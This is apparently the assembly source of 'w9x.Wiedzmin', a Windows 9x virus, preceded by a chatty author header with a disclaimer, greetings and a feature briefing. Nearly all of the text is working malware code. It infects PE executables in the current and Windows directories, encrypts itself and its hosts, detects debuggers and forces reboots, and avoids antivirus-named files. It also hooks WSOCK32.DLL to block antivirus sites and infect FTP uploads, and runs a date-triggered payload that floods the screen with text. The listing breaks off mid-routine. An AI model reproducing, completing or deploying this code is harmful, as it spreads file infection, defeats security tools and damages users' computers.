;
;         W                          D                                  nnn
;        WW       Ww   o             D                M   O    Nn      nn
;       Ww        wW  i   eEeE   dddDD  ZzzZzZ  Mm   m m        nN    nn
;       wW        Ww  ii  e  E  d   dD      Zz  m M M  mm  ii   N n   n
;       Ww   w    wW  ii  Eeee  d   dD     z    mm m    m   i   n  N  n
;        W  W W   W   ii  e     d   dD    z      m    mm   ii   n   n n
;        wWw  wWwW   iii  eEee  d   dD  zZzZzZ  mm    mm    ii  n    nn
;                               ddddDd               mm   iii n      n
;             
;             ă(c) YuP - Deithwen Addan - Artist of Rebelionă      
;                              ă yup@tlen.pl ă
;                                
;   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ                                  
;  Ä      w9x.Wiedzmin       Ä     
;   ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ                                  
;                                                            
;               
;   ÄÄÄÄÄÄÄÄÄÄÄ            
;  ÄDISCLAIMERĝ             
;   ÄÄÄÄÄÄÄÄÄÄÄ
;  This is a source of a virus, only source the compiled version
;  cannot leave your computer! Author is NOT RESPONSIBLE FOR ANY
;  ACTIONS WITH THIS CODE!               
;           
;                        
;                        
;   ÄÄÄÄÄÄÄÄÄÄÄÄ            
;  Ä The name  ĝ
;   ÄÄÄÄÄÄÄÄÄÄÄÄ
;              
;  The name 'Wiedzmin' was stolen from Andrzej Sapkowski saga "Wiedzmin".
;  (sapkowski.pl,sapkowski.cz) - someone said that he is another
;  Tolkien (in my opinion this book is even better then Tolkienz
;  "Lord of the Rings"). 
;  Wiedzmin was a some kind of mutant (only few kids from 10 can survive
;  wiedzmin test). As a mutant he was very fast, he was master of fencig,
;  he can see at night, and he of course can make magic signs.
;  Blah ...
;  Next he went, and travel around the world (he was killing monsterz for money). 
;  In his journey he met new fantasic characters like Regis (vapire), 
;  Milva (hunter), Jaskier (bard), Yennefer (witch) , Ciri (child of destinty)
;  ...
;  
;  The book is realy FANTASTIC! Full of adventures, fight, sex (X-D),
;  blood, swearwords, and much much more! I realy advice you to READ IT!
;  (check translationz for your language: www.sapkowski.pl). 
;  If you like fantasy you CAN'T miss IT!
;  
;  
;   ÄÄÄÄÄÄÄÄÄÄÄÄ            
;  Ä   Music   ĝ
;   ÄÄÄÄÄÄÄÄÄÄÄÄ
;  
;   I'd like to thx some kewl music groups in range of rock-hiphop:
;   Outsidez:                                Polish groupz: 
;   ćDeep Purple                             ćMolesta      
;   ćIron Maiden                             ćFenomen
;   ćLinkin Park                             ćZipera
;   ćRage Against the Machine                ćGrammatik 
;   ćKoRn                                    ćEldo
;   ćLimp Bizkit                             ćKaliber 44
;
;   I'm a weird person ;] 
;                        
;
;   ÄÄÄÄÄÄÄÄÄÄÄÄ            
;  Ä   Greetz  ĝ
;   ÄÄÄÄÄÄÄÄÄÄÄÄ
;
;   Greetz go to:
;   ćFriendz from city:
;    ŸYoo             (:])
;    ŸMisiek          (dzienx za plyty stary)
;    ŸKlosina         (nie rzucaj nozami)
;    ŸStraż Miejska   (nie trzymamy nog na lawkach :p) 
;    ŸI dla reszty ludkuf, nie wymienialem was bo i tak
;     nigdy tego nie przeczytacie.
;
;   ćGuyz from Undernet:
;    ŸToro           (busy today?)
;    ŸSlageHammer    (helo tester ;D)
;    ŸSpanska        (BloodHound.W32.WSWORM ;[) 
;    żBFF70000h      (lagz lagz lagz)
;
;   ćGuyz from irc.pl:
;    ŸBlaze          (stuk puk)    
;    ŸDetergent      (walek)
;    ŸShmastah       (judeIRC ;])
;    ŸAjron          (ten nie prawdziwy :P)
;    ŸAamf-girl      (gimnazjalistka ;P)
;    ŸWizja          (dolly ma reumatyzm czy jakos tak ;>)
;    ŸPafko          (dragonball rulez!)
;    ŸCrash          (why you? ;P)
;     
;
;   ÄÄÄÄÄÄÄÄÄÄÄÄ            
;  Ä  Briefing ĝ
;   ÄÄÄÄÄÄÄÄÄÄÄÄ
;            
;  Virus name        : w9x.Wiedzmin
;  Virus version     : 1.0 
;  Virus author      : Lord YuP - Deithwen Addan     
;  Release date      : 6.02.02+8.02.02 i forgot to install SEH, he he
;  Virus type        : PE infector and WSOCK32.DLL hooker
;  Target Systems    : win95<nt>, win98<nt>, winME<t>
;                      †[nt] - not tested (should work, if not fuck it!)
;                      †[t]  - tested
;                                   
;                                   
;  Encryption        : 3 LAYERS CRYPTED BY RANDOM NUMBER! 
;                      † 1 - cryptz main virus body †
;                      † 2 - cryptz host body       †
;                      † 3 - cryptz virus data      †
;                      
;                      Every layer is crypted by another key.
;                                                    
;  Virus helper      : Virus when found section called different
;                      then ".text" or "CODE" (EIP must point to
;                      it) it is gonna to crypt all file body
;                      and put only decryptor into last section.
;                      The main body (with other virus probably) 
;                      is crypted by random key. EIP points to
;                      decryptor.
;                      
;                      
;                                                                          
;  Polymorphic       : Yep random key crypting, adding
;                      90h<NOP> garbage in the range
;                      of 0-255.                                    
;                        
;                             
;  AntiAV            : Virus wouldn't infect filez
;                      with 'a','A','E','e','v','V'
;                      at start.                             
;                                           
;  
;  AntiDEBUG         : Yep, using win9x Softice detection,
;                      and IsDebuggerPresent API. When
;                      sice is found it shows message in
;                      debbuger and exec int 19h !
;                      Other debbugers like td32, SoftSnoop
;                      end so on =  int 19h!
;                       
;                      
;  WSOCK32 hooker    : Virus infect wsock32.dll replacing the
;                      send, connect function addressez.
;                      After reboot (wininit.ini ;P) functionz
;                      will be hooked. User will never connect 
;                      to AV sitez (error: host not found), 
;                      and when user will try to put a file in
;                      the FTP account, virus will infect it on
;                      fly.                     
;  
;  
;  
;  Infection procez  : Virus infect 7 filez in the local
;                      directory and 7 filez in the windowz
;                      directory. Virus is going to apend
;                      itself to the last section. The section
;                      is increased. EIP points to it.                                 
;                                                  
;                                                         
;
;  Payload           : On 22.06 or 22.12 every run it gonna
;                      print color string in the infinite 
;                      loop. The string will be VISIBLE 
;                      everywhere - virus grabz active
;                      window HDC! 
;
;
;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIEDZMIN.ASM]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.386
.model flat
jumps                                      
locals




       
        extrn ExitProcess:PROC       
        extrn MessageBoxA:PROC
       
     

FILETIME STRUC
dwLowDateTime   dd ?
dwHighDateTime  dd ?
FILETIME ends



WIN32_FIND_DATA         struc          ;FIND DATA  
dwFileAttributes        dd      0
dwLowDateTime0          dd      ?       
dwHigDateTime0          dd      ?
dwLowDateTime1          dd      ?       
dwHigDateTime1          dd      ?
dwLowDateTime2          dd      ?       
dwHigDateTime2          dd      ?
nFileSizeHigh           dd      ?
nFileSizeLow            dd      ?
dwReserved              dd      0,0
cFileName               db      260 dup(0)
cAlternateFilename      db      14 dup(0)
                        db      2 dup(0)
WIN32_FIND_DATA         ends

hooksize equ hook_end-start_h
sendh equ (offset hooked_send-offset start_h)
connecth equ (offset hooked_connect-offset start_h)





vvsize              equ HeapEnd-HeapStart
virussize           equ VirusEnd-v_start
allsize             equ virussize
TO_DE               equ @loop_decryptt-@to_this
helper              equ @helper_end-@uncrypt


virussizee       macro
		db      virussize/10000 mod 10 + "0"
		db      virussize/01000 mod 10 + "0"
		db      virussize/00100 mod 10 + "0"
		db      virussize/00010 mod 10 + "0"
		db      virussize/00001 mod 10 + "0"
		endm

    
  
        
.DATA

     
db ?


.CODE
v_start:
pushad
pushfd

call @delta
@delta:
pop ebp                       ;ebp contains address of  @delta right now in
sub ebp,offset @delta         ;memory -> we must sub the linking @delta val

cmp ebp,0
je @_KERNEL


@main_decryptor:
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE


@loop_decrypt:
xor byte ptr [edx],al
inc edx
loop @loop_decrypt
cmp edi,'!PUY'
jne @to_this
ret



@to_this:
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
call @UN_CRYPT_BYTEZ

lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
call @UN_CRYPT_BYTEZ


@_KERNEL:
lea eax, [ebp+fault]                ; Setup a SEH frame
push eax                                    
push dword ptr fs:[0]                       
mov fs:[0], esp                             

mov eax,0BFF70000h             ;kerneloz w95
cmp word ptr [eax],'ZM'
je _GOT_KERNEL
                        ;NT moze pozniej :p



mov eax,0BFF60000h             ;ladujemy kernela ;) winME ;)
cmp word ptr [eax],'ZM'        ;check is it a exe file
je _GOT_KERNEL

jmp @EXIT


_GOT_KERNEL:
mov dword ptr [ebp+capis],5h
mov dword ptr [ebp+Kernel],eax


@go_export:

mov dword ptr [ebp+NON],000000h
mov dword ptr [ebp + AOF],000000h
mov dword ptr [ebp + AON],000000h
mov dword ptr [ebp + AOO],000000h

mov edx,eax
mov ebx,edx


mov edi, [eax + 03ch]          ;a valid PE ?
add edx, edi
cmp dword ptr [edx],'EP'
jne @EXIT



mov edx,[edx + 078h]           ;export table
add edx,eax                    ;mamy w edx -> export table




mov esi,[edx + 018h]
mov dword ptr [ebp + NON],esi


mov esi,[edx+1Ch]
mov dword ptr [ebp + AOF],esi
add dword ptr [ebp + AOF],eax

mov esi,[edx+20h]
mov dword ptr [ebp + AON],esi
add dword ptr [ebp + AON],eax

mov esi,[edx+24h]
mov dword ptr [ebp + AOO],esi
add dword ptr [ebp + AOO],eax





@export_read:
mov esi,dword ptr [ebp + AON]
mov [ebp+offset IndexA],esi           ;save into naming index
mov esi,dword ptr [esi]
add esi,eax

xor ebx,ebx


@__GPA:


cmp dword ptr [ebp+capis],5h
je @zwykle


lea edi,[ebp+offset A1]
mov ecx,A1s



cmp dword ptr [ebp+capis],1
jne @porownaj 

lea edi,[ebp+offset A2]
mov ecx,A2s
jmp @porownaj

@zwykle:
lea edi,[ebp + offset APIS]                  ;mam offset zmiennej



@GET_GPA:
mov ecx,APIS_SIZE                          ;size api


@porownaj:
rep cmpsb                                  ;scan
je found                                   ;if equal calculate function address


Scan_dalej:
add dword ptr [ebp + offset IndexA],4
mov esi,[ebp + offset IndexA]
mov esi,[esi]
add esi,eax

cmp dword ptr [ebp+offset NON],ebx
je @EXIT
inc ebx
cmp dword ptr [ebp+offset NON],ebx
je @EXIT

jmp @__GPA

found:  
mov eax,ebx                                  ;mamy GPA !!! 

mov ecx,edi
inc ecx
push ecx                                   ;na stos ;P

mov eax,ebx                                ;EAX=>counter
mov ecx,2
mul ecx                                    ;mnozymy EAX*2
pop ecx                                    ;zdejmujemy ze stosu ECX

mov esi,[ebp + AOO]
add esi,eax
xor eax,eax


mov ax,word ptr [esi]
mov ecx,4
mul ecx




cmp dword ptr [ebp+go_wsock],1
jne @skip_it_urgh

mov esi,[ebp + AOF]
add esi,eax
mov eax,[esi]




cmp dword ptr [ebp+capis],1
je @make_1

;mov ebx,dword ptr [ebp+wsock_hh]
;mov dword ptr [ebp+a_send],eax
;add dword ptr [ebp+a_send],ebx
;mov eax,dword ptr [ebp+a_send]

mov ebx,sendh
mov edx,dword ptr [ebp+moj_address]                    ;tricky shit ;]
add edx,ebx
jmp make_real


@make_1:
mov ebx,connecth
mov edx,dword ptr [ebp+moj_address]                    ;tricky shit ;]
add edx,ebx 



make_real:


mov [esi],edx

inc dword ptr [ebp+capis]
cmp dword ptr [ebp+capis],2
je @go_out_now

mov eax,dword ptr [ebp+wsock_h]
jmp @go_export

@go_out_now: ret


@skip_it_urgh:
mov esi,[ebp + AOF]
add esi,eax
mov edi,dword ptr [esi]
add edi,[ebp+offset Kernel]
mov eax,edi
mov dword ptr [ebp+_GPA],eax




@GET_APIS:                                   ;API Search
xor esi,esi
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset _FindFirstFileA]
                                             ;mamy d wordy czyli skok co 4 bajty
                                             ;stosd -> z EAX do EDI



@go_table:
push esi
push dword ptr [ebp+offset Kernel]
call dword ptr [ebp+offset _GPA]
stosd

@next_byte:
inc esi
cmp byte ptr [esi],00h
jne @next_byte


inc esi
cmp byte ptr [esi],07h
jne @go_table

mov eax,dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+gcd],eax
mov eax,dword ptr [ebp+_WinExec]
mov dword ptr [ebp+wex],eax

lea eax,[ebp+offset wsock]
inc eax
push eax
call dword ptr [ebp+_LoadLibraryA]
mov dword ptr [ebp+wsock_hh],eax


lea ecx,[ebp+offset sle]
push ecx
push eax
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+_WSASetLastError],eax


lea ecx,[ebp+offset A1]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_send],eax


lea ecx,[ebp+offset A2]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_connect],eax



push 4h                             ; PAGE_READWRITE
push 1000h                          ; MEM_COMMIT
push 1000                           ; size of buffer
push 0                              ; lpAddress
call dword ptr [ebp+_VirtualAlloc]  ; Alloc IT!
mov dword ptr [ebp+vbuf],eax


;********************************DEBUG TRAP******************************************************
;call @debug_trap
;************************************************************************************************
call @wsockz
mov dword ptr [ebp+go_wsock],0

lea eax,[ebp+SYSTEM_TIME]
push eax
call dword ptr [ebp+_GetSystemTime]

cmp word ptr [ebp+wMonth],6          ;22.06 Midaëte
jne try_
cmp word ptr [ebp+wDay],22
jne try_
call make_it_real


try_:
cmp word ptr [ebp+wMonth],12         ;22.12 Midinvaerne 
jne cya_folx
cmp word ptr [ebp+wDay],22
jne cya_folx
call make_it_real


cya_folx:




call @GGEN_KEY
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
call @CRYPT_BYTEZ

lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
call @CRYPT_BYTEZ



_done:
lea edi,[ebp+finddata.cFileName]
call dword ptr [ebp+_GetCommandLineA]
mov esi,eax

xor ebx,ebx
_skip_space: 
lodsb
cmp al,0
je @GetWDir
cmp al,' '
je _ave_it
jmp _skip_space


_ave_it:
lodsb
inc ebx
cmp al,0
je @infect_shit
stosb
jmp _ave_it

@infect_shit:
cmp ebx,4
jl @GetWDir
lea esi,[ebp+offset finddata.cFileName]
add esi,ebx
sub esi,5
lodsb
cmp al,'.'
je yep_it
jmp @GetWDir
 

yep_it:

push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase] 
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]

push 0h
call dword ptr [ebp+_ExitProcess]


@GetWDir:
lea eax,[ebp+offset winDIR]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]

;now local dir
lea eax,[ebp+offset oldDIR]
push eax
push 560
call dword ptr [ebp+_GetCurrentDirectoryA]


mov dword ptr [ebp+was_win],0000000h
@Find1st:
mov dword ptr [ebp+ic],0000000h
lea eax,[ebp+offset finddata]
push eax
lea eax,[ebp+offset marker]
push eax
call dword ptr [ebp+_FindFirstFileA]
mov dword ptr [ebp+sHnd],eax
inc eax
jz @d_dalej

@workk:
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase] 
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]


@@Fnext:
lea eax,[ebp+offset finddata]
push eax
push dword ptr [ebp+offset sHnd]
call dword ptr [ebp+_FindNextFileA]
cmp eax,0
je @d_dalej

push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase] 
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]


cmp dword ptr [ebp+ic],7
jne @@Fnext

@d_dalej:
cmp dword ptr [ebp+was_win],0
jne @dalej

_WinINF:
cmp dword ptr [ebp+was_win],0
jne _stepnext



lea eax,[ebp+offset winDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]

mov dword ptr [ebp+ic],0000000h
mov dword ptr [ebp+was_win],1



push dword ptr [ebp+sHnd]
call dword ptr [ebp+_FindClose]



_stepnext:
cmp dword ptr [ebp+ic],7
jne @Find1st


@dalej:
lea eax,[ebp+offset oldDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
jmp @EXIT

fault:
mov esp, [esp+8]                            

@EXIT:

push 4000h
push 1000
push dword ptr [ebp+vbuf]
call dword ptr [ebp+_VirtualFree]

pop dword ptr fs:[0]                       
add esp, 4                                  


cmp ebp,0             ;first GeneratioN?
jne _ETH              ;tak to wyjc ;]
call fakehost


_ETH:

call @uncrypt


popfd
popad
call @gd
@gd: pop ebp
     sub ebp,offset @gd
       
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]                  
jmp eax  

Kernel dd 0
                   



;<##############################################################################################>
;------------------------------------------------------------------------------------------------
;************************************************************************************************
;INFECT EM GLOWZ !!!!
;************************************************************************************************
;------------------------------------------------------------------------------------------------
;<##############################################################################################>

@infect:
call @bad_name
cmp edi,1
jne _continue
ret

@infect0:
_continue:
lea esi,[ebp+offset finddata.cFileName]

push esi
call dword ptr [ebp+_GetFileAttributesA]
mov dword ptr [ebp+fileAtrib],eax
inc eax
jz _Out

lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_GetFileTime]


push 00000080h
push esi
call dword ptr [_SetFileAttributesA+ebp]     ; clean file
cmp eax,0
je _Out

;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
;mov [ebp+offset memory],ecx


;Ble otfieramy zeby miec handle
xor eax,eax
lea esi,[ebp+offset finddata.cFileName]
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [ebp+_CreateFileA]
mov edi,eax                                 ;w edi handle 
inc eax
jz _Out
dec eax
mov dword ptr [ebp+offset fileHandle],eax



_Oblicz:
push 0
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_GetFileSize]
mov dword ptr [ebp+fSize],eax
inc eax
jz _Out2
dec eax
mov dword ptr [ebp+finddata.nFileSizeLow],eax

mov ecx,dword ptr [ebp+fSize]
call MapF


mov ecx,dword ptr [ebp+fSize]
call VMapF
                                     ;w esi mamy maping tak jak z kernelem             

_Check_PE:
cmp word ptr [esi],'ZM'
jne _Out3

mov ecx,[esi+3ch]
cmp dword ptr [esi+ecx],'EP'
jne _Out3


add esi,ecx                      ;ESI => PE HEADER               
mov edi,esi


_Saving:
mov dword ptr [ebp+header],esi
mov ecx,[esi+28h]
mov dword ptr [ebp+hosteip],ecx
mov ecx,[esi+3ch]
mov dword ptr [ebp+align],ecx
mov ecx,[esi+34h]
mov dword ptr [ebp+imagebase],ecx
mov ecx,[esi+38h]                          ;get section align value
mov [ebp + _secAlign],ecx                  ;and save it



_Infecto0:
cmp dword ptr [esi+4ch],"deiW"
jz _No_infect



push  dword ptr [esi+3Ch]



;***********************************************************************************************

mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax

push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]


;mov eax,dword ptr [ebp+go_wsock]



mov eax,dword ptr [ebp+fSize]            ; And Map all again.
cmp dword ptr [ebp+go_wsock],1
je @dodaj
add eax,virussize+vvsize
;add eax,vvsize
jmp @nextt

@dodaj:add eax,hooksize




@nextt:
pop ecx
call Align_
mov dword ptr [ebp+memory],eax


mov ecx,eax
call MapF

mov ecx,dword ptr [ebp+memory]
call VMapF

cmp dword ptr [ebp+go_wsock],1
je @0dal
call @crypt_host
cmp dword ptr [ebp+help_virus],1
je _God


@0dal:
mov esi,[eax+3ch]
add esi,eax                      ;ESI => PE HEADER               
mov edi,esi


;************************************************************************************************

inc dword ptr [ebp+ic]

xor eax,eax
mov ax,[esi + 06h]                  ;load number of sections
mov ecx,28h                         ;28 bytes for each section header
dec eax                             ;seeking for last,...
mul ecx                             ;and mul it
add esi,eax                         ; Normalize
add esi,78h                         ; Ptr to dir table
mov edx,[edi+74h]                   ; EDX = n§ of dir entries
shl edx,3                           ; EDX = EDX*8
add esi,edx                         ; ESI = Ptr to last section


mov edx,[esi+10h]                   ; EDX = SizeOfRawData
mov ebx,edx                         ; EBX = EDX
add edx,[esi+14h]                   ; EDX = EDX+PointerToRawData

push edx                             ; Preserve EDX

mov eax,ebx                         ; EAX = EBX
add eax,[esi+0Ch]                   ; EAX = EAX+VA Address
                                                ; EAX = New EIP
;mov [edi+28h],eax                   ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax      ; Also store it

cmp dword ptr [ebp+go_wsock],1
je @infect_then


mov eax,dword ptr [ebp+NewEIP]
mov [edi+28h],eax


@infect_then:
mov eax,[esi+10h]                   ; EAX = new SizeOfRawData
cmp dword ptr [ebp+go_wsock],1
je @dallejj
add eax,vvsize+virussize            ; EAX = EAX+VirusSize
jmp @nexttt

@dallejj: add eax,hooksize
@nexttt:
mov ecx,[edi+3Ch]                   ; ECX = FileAlignment
call Align_                         ; Align!

mov [esi+10h],eax                   ; New SizeOfRawData

mov [esi+08h],eax                   ; New VirtualSize

pop edx                             ; EDX = Raw pointer to the
                                    ; end of section
cmp dword ptr [ebp+go_wsock],1
je @skip_thiss

mov eax,[esi+10h]                   ; EAX = New SizeOfRawData
add eax,[esi+0Ch]                   ; EAX = EAX+VirtualAddress
mov [edi+50h],eax                   ; EAX = New SizeOfImage

@skip_thiss:
or dword ptr [esi+24h],0A0000020h

mov dword ptr [edi+4ch],"deiW"                       ;Wiedzmin here ;)

lea esi,[ebp+v_start]                 ; ESI = Ptr to virus_start
xchg edi,edx                          ; EDI = Raw ptr after last
mov dword ptr [ebp+moj_address],edi
          
                           ; section
add edi,dword ptr [ebp+fMapReal]       ;EDI = Normalized ptr
mov ecx,virussize                      ;ECX = Size to copy


cmp dword ptr [ebp+go_wsock],1
jne @write_it
mov ecx,hooksize


lea esi,[ebp+start_h]


@write_it:  

cmp dword ptr [ebp+go_wsock],1
je step_0
call @crypt_my_body
jmp step_1
step_0: rep movsb                           ;Do it!
        
 
step_1:
cmp dword ptr [ebp+go_wsock],1
jne _Git
ret

_Git:
jmp _God


_No_infect:
cmp dword ptr [ebp+go_wsock],1
jne @zw
mov edx,-1
jmp _God

@zw:
mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
call @zostaf
dec dword ptr [ebp+ic]


_God:
 
 mov eax,[ebp+offset fMapReal]
 push eax
 mov eax, [ebp+_UnmapViewOfFile]
 call eax



_Out3:
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]





_Out2:
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_SetFileTime]

push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_CloseHandle]

cmp dword ptr [ebp+go_wsock],1
je @@@z
push 1
lea eax,[ebp+santa]
push eax
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_CopyFileA]

@@@z:
;&resetore the attributez
push dword ptr [ebp+fileAtrib]
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_SetFileAttributesA]
mov edx,-1


_Out:

ret



Align_:
        push    edx
        xor     edx,edx
        push    eax
        div     ecx
        pop     eax
        sub     ecx,edx
        add     eax,ecx
        pop     edx
        ret





@zostaf:
xor  eax,eax
push eax
push eax
push ecx
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetFilePointer]

push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetEndOfFile]
ret

;**************************
;ECX - size to map
;**************************
MapF: 
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+_CreateFileMappingA]
cmp eax,0
je _Out2
mov dword ptr [ebp+fHndMap],eax
ret


VMapF: 
xor eax,eax
push ecx
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_MapViewOfFile]
cmp eax,0
je _Out3
mov dword ptr [ebp+fMapReal],eax
mov esi,eax 
ret

@TRY_RELOC:
ret

@debug_trap: ;ret
call dword ptr [ebp+_IsDebuggerPresent]
or eax,eax
jz _leave_me
ble: mov eax, 909119cdh	              ;int 19h!
     jmp $ - 4		


_leave_me: 
lea eax,[ebp+sice9x]
push    00000000h                      
push    00000080h                    
push    00000003h                      
push    00000000h
push    00000001h
push    0C0000000h
push    eax
call    dword ptr [ebp+_CreateFileA]

inc eax
jz leave_it
dec eax

push eax
call dword ptr [ebp+_CloseHandle] 

lea eax,[ebp+to_ja]
push eax
call dword ptr [ebp+_OutputDebugStringA]
mov eax, 909119cdh	              ;int 19h!
jmp $ - 4	
jmp @EXIT

leave_it: ret



;************************************************************************************************
;PayL0ad ;]
;this is very simple coz i don't have any time to make it perfect
;************************************************************************************************
payload:
p_x dd 0
p_y dd 0

hdc dd 0
wh dd 0

screen_x dd 0
screen_y dd 0


font  dd 0


color: dd 15466513
       dd 15474944
       dd 15484928
       dd 15496448



make_it_real:
pay:

lea esi,[ebp+@GDI_APIZ]
lea edi,[ebp+@GDI_APIZA]
lea ebx,[ebp+gdi32]

change_l:
push ebx
call dword ptr [ebp+_LoadLibraryA]
mov ebx,eax


@find_a:
push esi
push ebx
call dword ptr [ebp+_GPA]
stosd

check_a:
inc esi
cmp byte ptr [esi],0
jne check_a

inc esi
cmp byte ptr [esi],77h
je change_ll

cmp byte ptr [esi],69h
je @go_pay

jmp @find_a


change_ll: inc esi
           lea ebx,[ebp+user32]
           jmp change_l


@go_pay:


push 1
call dword ptr [ebp+_GetSystemMetrics]  ;user
mov dword ptr [ebp+screen_y],eax

push 0			
call dword ptr [ebp+_GetSystemMetrics]	;user 
mov dword ptr [ebp+screen_x],eax

call c_font
lea esi,logo
xor ebx,ebx

l:
call dword ptr [ebp+_GetDesktopWindow] ;user
mov dword ptr [ebp+wh],eax

push dword ptr [ebp+wh]
call dword ptr [ebp+_GetWindowDC]      ;user
mov dword ptr [ebp+hdc],eax

call draww

push dword ptr [ebp+hdc]
push dword ptr [ebp+wh]
call dword ptr [ebp+_ReleaseDC]        ;user

jmp l

draww:
xor eax,eax
lodsb
lea edi,[ebp+jed]
stosb
cmp al,0
jne @wypisz
lea esi,[ebp+logo]
lodsb
lea edi,[ebp+jed]
stosb

@wypisz:
cmp al,'i'
jne @dik
add dword ptr [ebp+p_x],6 

@dik:
push dword ptr [ebp+font]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SelectObject]   ;gdi

push 0
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetBkMode]      ;gdi

mov eax,dword ptr [ebp+color+ebx]
add ebx,4
cmp ebx,4*4
jl @n1
xor ebx,ebx

@n1:
push eax
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetTextColor]    ;gdi

push 1
lea eax,[ebp+jed]
push eax
push dword ptr [ebp+p_y]
push dword ptr [ebp+p_x]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_TextOutA]        ;gdi

mov eax,dword ptr [ebp+screen_y]
cmp dword ptr [ebp+p_y],eax
jae chang_g 
mov eax,dword ptr  [ebp+screen_x]
add dword ptr [ebp+p_x],13
cmp dword ptr [ebp+p_x],eax
jle spp
mov dword ptr [ebp+p_x],0
add dword ptr [ebp+p_y],15
jmp spp

chang_g: mov dword ptr [ebp+p_y],0

spp:
push 50
call dword ptr [ebp+_Sleep]
ret

c_font:
push offset famil
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push 9
push 9
call dword ptr [ebp+_CreateFontA]     ;gdi
mov [font],eax
ret




@GDI_APIZ:  db "CreateFontA",0
            db "TextOutA",0
            db "SetBkMode",0
            db "SetTextColor",0
            db "SelectObject",0
            db 77h
            db "GetSystemMetrics",0    ;user32 part X-D
            db "GetDesktopWindow",0
            db "GetWindowDC",0
            db "ReleaseDC",0
            db 69h


;************************************************************************************************
;Handle this sucker ;]
;************************************************************************************************
@crypt_host: 
;push dword ptr [ebp+key_next]
pushad

mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax                        ;ESI => PE HEADER               
mov edi,esi

xor eax,eax
mov ax,[esi + 06h]                 ;load number of sections
mov ecx,0h                         ;28 bytes for each section header

add esi,ecx                         ; Normalize
add esi,78h                         ; Ptr to dir table
mov edx,[edi+74h]                   ; EDX = n§ of dir entries
shl edx,3                           ; EDX = EDX*8
add esi,edx                         ; ESI = Ptr to last section

mov ecx,[edi+28h]

search_it:
mov ebx,dword ptr [esi+0ch]
add ebx,dword ptr [esi+08h]



inc eax
cmp ecx,ebx
jb sfound         
dec eax
jz @e_error
add esi,28h
jmp search_it

sfound:
test dword ptr [esi+24h],10000000h   ;check section atributes   
jnz @e_error
or dword ptr [esi+24h],0A0000020h

